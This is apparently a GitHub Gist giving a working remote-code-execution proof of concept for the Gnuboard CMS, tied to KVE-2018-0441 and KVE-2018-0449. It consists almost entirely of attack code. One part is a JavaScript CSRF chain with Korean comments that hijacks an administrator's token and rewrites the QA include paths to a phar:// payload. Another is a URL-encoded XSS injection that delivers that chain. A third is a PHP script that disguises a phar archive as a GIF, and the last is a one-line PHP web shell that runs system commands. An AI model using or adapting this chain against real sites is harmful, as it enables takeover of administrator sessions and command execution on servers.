Last active
August 3, 2019 16:47
-
-
Save stypr/c95d98f4a2ff754abe9dc50aac082916 to your computer and use it in GitHub Desktop.
KVE-2018-0441, KVE-2018-0449 RCE PoC (Windows Only)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// 업로드한 파일의 페이로드. | |
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`; | |
var payload = `[PAYLOAD_URL]` | |
// 먼저 공격에 앞서, 해당 기능을 지원하는 관리자인지 확인한다. | |
$.get(`../qa_config.php`, function(d){ | |
// 수정할 곳은 ”파일 경로“ 가 들어간 곳이므로, 이 부분만 우선 확인한다. | |
if(d.indexOf(`상단 파일 경로`) !== false){ | |
// 1:1 관리 페이지를 iframe으로 로드한다. | |
$(`body`).html(`<iframe src=../qa_config.php width=1 height=1></iframe>`); | |
// iframe 로딩이 전부 완료 되었으면 | |
$(`iframe`).load(function(){ | |
var this_frame = top.window.frames[0].document; | |
var exploitable = false; | |
// 관리자 토큰을 가져온다 | |
$(`input[name=token]`, this_frame).val(get_ajax_token()); | |
// qa_include_head가 빈칸이면 없애준다. | |
if($(`input[name=qa_include_head]`, this_frame).val() == ``){ | |
$(`input[name=qa_include_head]`, this_frame).remove(); | |
exploitable = true; | |
} | |
// qa_include_tail이 빈칸이면 없애준다. | |
if($(`input[name=qa_include_tail]`, this_frame).val() == ``){ | |
$(`input[name=qa_include_tail]`, this_frame).remove(); | |
exploitable = true; | |
} | |
// 둘 다 빈칸이 아니면 공격이 불가능. | |
if(!exploitable){ | |
alert(`공격이 안됩니다.`); | |
return; | |
} | |
// 만약 둘 중 하나라도 빈칸인 경우, 공격이 가능하다. | |
var form_data = $(`form`, this_frame).serialize(); | |
$.post(`../qa_config_update.php?qa_include_head=${payload}&qa_include_tail=${payload}`, form_data, function(d){ | |
// 성공 했으니 QA 페이지로 이동한다. | |
alert(`CSRF to RCE 성공`); | |
location = g5_bbs_url + `/qalist.php?a=system&b=dir`; | |
}); | |
}); | |
}else{ | |
// 최고 관리자가 아니므로 정상적인 URL(ex. https://naver.com)로 이동 | |
location= `//naver.com/`; | |
} | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://[그누보드URL]/adm/sms_admin/num_book_write.php?exist_msg_2=1%0d%0a}}}});%20return%20false;};var%20payload=`[PAYLOAD_URL]`;$.get(`../qa_config.php`,function(d){if(d.indexOf(`상단%20파일%20경로`)!==!1){$(`body`).html(`<iframe%20src=../qa_config.php%20width=1%20height=1>`);$(`iframe`).load(function(){var%20this_frame=top.window.frames[0].document;var%20exploitable=!1;$(`input[name=token]`,this_frame).val(get_ajax_token());if($(`input[name=qa_include_head]`,this_frame).val()==``){$(`input[name=qa_include_head]`,this_frame).remove();exploitable=!0}%20if($(`input[name=qa_include_tail]`,this_frame).val()==``){$(`input[name=qa_include_tail]`,this_frame).remove();exploitable=!0}%20if(!exploitable){alert(`no`);return}%20var%20form_data=$(`form`,this_frame).serialize();$.post(`../qa_config_update.php?qa_include_head=${payload}%26qa_include_tail=${payload}`,form_data,function(d){location=g5_bbs_url+`/qalist.php?a=system%26b=dir`})})}else{location=`//naver.com/`}})</script><!-- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
Phar generator | |
# php -v | |
PHP 7.0.27-0+deb9u1 (cli) (built: Jan 5 2018 13:51:52) ( NTS ) | |
Copyright (c) 1997-2017 The PHP Group | |
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies | |
with Zend OPcache v7.0.27-0+deb9u1, Copyright (c) 1999-2017, by Zend Technologies | |
*/ | |
$a = new PharData("exploit.tar"); | |
$a->addFile("shell.php", "GIF89a.php"); | |
unset($a); | |
rename("exploit.tar", "exploit.gif"); | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
@$_GET['a']($_GET['b']); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment